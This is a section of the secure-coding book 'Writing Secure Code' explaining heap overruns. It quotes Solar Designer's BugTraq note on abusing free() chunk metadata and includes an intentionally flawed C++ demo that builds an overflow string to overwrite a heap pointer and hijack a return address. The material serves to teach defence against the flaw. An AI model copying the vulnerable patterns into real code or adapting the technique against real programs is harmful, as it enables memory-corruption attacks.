Heap Overruns | Writing Secure Code, Second Edition

Heap Overruns

A heap overrun is much the same problem as a stack-based buffer overrun, but it's somewhat trickier to exploit. As in the case of a stack-based buffer overrun, your attacker can write fairly arbitrary information into places in your application that she shouldn't have access to. One of the best articles I've found is w00w00 on Heap Overflows, written by Matt Conover of w00w00 Security Development (WSD). You can find this article at http://www.w00w00.org/files/articles/heaptut.txt. WSD is a hacker organization that makes the problems they find public and typically works with vendors to get the problems fixed. The article demonstrates a number of the attacks they list, but here's a short summary of the reasons heap overflows can be serious:

Many programmers don't think heap overruns are exploitable, leading them to handle allocated buffers with less care than static buffers.
Tools exist to make stack-based buffer overruns more difficult to exploit. StackGuard, developed by Crispin Cowan and others, uses a test value known as a canary after the miner's practice of taking a canary into a coal mine to make a static buffer overrun much less trivial to exploit. Visual C++ .NET incorporates a similar approach. Similar tools do not currently exist to protect against heap overruns.
Some operating systems and chip architectures can be configured to have a nonexecutable stack. Once again, this won't help you against a heap overflow because a nonexecutable stack protects against stack-based attacks, not heap-based attacks.

Although Matt's article gives examples based on attacking UNIX systems, don't be fooled into thinking that Microsoft Windows systems are any less vulnerable. Several proven exploitable heap overruns exist in Windows applications. One possible attack against a heap overrun that isn't detailed in the w00w00 article is detailed in the following post to BugTraq by Solar Designer (available at http://www.securityfocus.com/archive/1/71598):

To: BugTraq

Subject: JPEG COM Marker Processing Vulnerability in Netscape Browsers

Date: Tue Jul 25 2000 04:56:42

Author: Solar Designer < solar@false.com >

Message-ID: <200007242356.DAA01274@false.com>

[nonrelevant text omitted]

For the example below, we'll assume Doug Lea's malloc (which is used by most Linux systems, both libc 5 and glibc) and locale for an 8-bit character set (such as most locales that come with glibc, including en_US or ru_RU.KOI8-R).

The following fields are kept for every free chunk on the list: size of the previous chunk (if free), this chunk's size, and pointers to next and previous chunks. Additionally, bit 0 of the chunk size is used to indicate whether the previous chunk is in use (LSB of actual chunk size is always zero due to the structure size and alignment).

By playing with these fields carefully, it is possible to trick calls to free(3) into overwriting arbitrary memory locations with our data.

[nonrelevant text omitted]

Please note that this is by no means limited to Linux/x86. It's just that one platform had to be chosen for the example. So far, this is known to be exploitable on at least one Win32 installation in a very similar way (via ntdll!RtlFreeHeap).

A more recent presentation by Halvar Flake can be found at http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt. Halvar's article also details several other attacks discussed here.

The following application shows how a heap overrun can be exploited:

/* HeapOverrun.cpp */ #include <stdio.h> #include <stdlib.h> #include <string.h> /* Very flawed class to demonstrate a problem */ class BadStringBuf { public: BadStringBuf(void) { m_buf = NULL; } ~BadStringBuf(void) { if(m_buf != NULL) free(m_buf); } void Init(char* buf) { //Really bad code m_buf = buf; } void SetString(const char* input) { //This is stupid. strcpy(m_buf, input); } const char* GetString(void) { return m_buf; } private: char* m_buf; }; //Declare a pointer to the BadStringBuf class to hold our input. BadStringBuf* g_pInput = NULL; void bar(void) { printf("Augh! I've been hacked!\n"); } void BadFunc(const char* input1, const char* input2) { //Someone told me that heap overruns weren't exploitable, //so we'll allocate our buffer on the heap. char* buf = NULL; char* buf2; buf2 = (char*)malloc(16); g_pInput = new BadStringBuf; buf = (char*)malloc(16); //Bad programmer - no error checking on allocations g_pInput->Init(buf2); //The worst that can happen is we'll crash, right??? strcpy(buf, input1); g_pInput->SetString(input2); printf("input 1 = %s\ninput 2 = %s\n", buf, g_pInput ->GetString()); if(buf != NULL) free(buf); } int main(int argc, char* argv[]) { //Simulated argv strings char arg1[128]; //This is the address of the bar function. // It looks backwards because Intel processors are little endian. char arg2[4] = {0x0f, 0x10, 0x40, 0}; int offset = 0x40; //Using 0xfd is an evil trick to overcome //heap corruption checking. //The 0xfd value at the end of the buffer checks for corruption. //No error checking here it is just an example of how to //construct an overflow string. memset(arg1, 0xfd, offset); arg1[offset] = (char)0x94; arg1[offset+1] = (char)0xfe; arg1[offset+2] = (char)0x12; arg1[offset+3] = 0; arg1[offset+4] = 0; printf("Address of bar is %p\n", bar); BadFunc(arg1, arg2); if(g_pInput != NULL) delete g_pInput; return 0; }

You can also find this program in the companion content in the folder Secureco2\Chapter05. Let's take a look at what's going on in main. First I'm going to give myself a convenient way to set up the strings I want to pass into my vulnerable function. In the real world, the strings would be passed in by the user. Next I'm going to cheat again and print the address I want to jump into, and then I'll pass the strings into the BadFunc function.

You can imagine that BadFunc was written by a programmer who was embarrassed by shipping a stack-based buffer overrun and a misguided friend told him that heap overruns weren't exploitable. Because he's just learning C++, he's also written BadStringBuf, a C++ class to hold his input buffer pointer. Its best feature is its prevention of memory leaks by freeing the buffer in the destructor. Of course, if the BadStringBuf buffer is not initialized with malloc, calling the free function might cause some problems. Several other bugs exist in BadStringBuf, but I'll leave it as an exercise to the reader to determine where those are.

Let's start thinking like a hacker. You've noticed that this application blows up when either the first or second argument becomes too long but that the address of the error (indicated in the error message) shows that the memory corruption occurs up in the heap. You then start the program in a debugger and look for the location of the first input string. What valuable memory could possibly adjoin this buffer? A little investigation reveals that the second argument is written into another dynamically allocated buffer where's the pointer to the buffer? Searching memory for the bytes corresponding to the address of the second buffer, you hit pay dirt the pointer to the second buffer is sitting there just 0x40 bytes past the location where the first buffer starts. Now we can change this pointer to anything we like, and any string we pass as the second argument will get written to any point in the process space of the application!

As in the first example, the goal here is to get the bar function to execute, so let's overwrite the pointer to reference 0x0012fe94 in this example, which in this case happens to be the location of the point in the stack where the return address for the BadFunc function is kept. You can follow along in the debugger if you like this example was created in Visual C++ 6.0, so if you're using a different version or trying to make it work from a release build, the offsets and memory locations could vary. We'll tailor the second string to set the memory at 0x0012fe94 to the location of the bar function (0x0040100f). There's something interesting about this approach we haven't smashed the stack, so some mechanisms that might guard the stack won't notice that anything has changed. If you step through the application, you'll get the following results:

Address of bar is 0040100F input 1 =²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²² 57 input 2 = 64@ Augh! I've been hacked!

Note that you can run this code in debug mode and step through it because the Visual C++ debug mode stack checking does not apply to the heap!

If you think this example is so convoluted that no one would be likely to figure this out on their own, or if you think that the odds of making this work in the real world are slim, think again. As Solar Designer pointed out in his mail, arbitrary code could have been executed even if the two buffers weren't conveniently next to one another you can trick the heap management routines.

NOTE
There are at least three ways that I'm aware of to cause the heap management routines to write four bytes anywhere you like, which can then be used to overwrite pointers, the stack, or, basically, anything you like. It's also often possible to cause security bugs by overwriting values within the application. Access checks are one obvious example.

A growing number of heap overrun exploits exist in the wild. It is sometimes harder to exploit a heap overrun than a stack-based buffer overrun, but to a hacker, regardless of whether he is a good or malicious hacker, the more interesting the problem, the cooler it is to have solved it. The bottom line here is that you do not want user input ever being written to arbitrary locations in memory.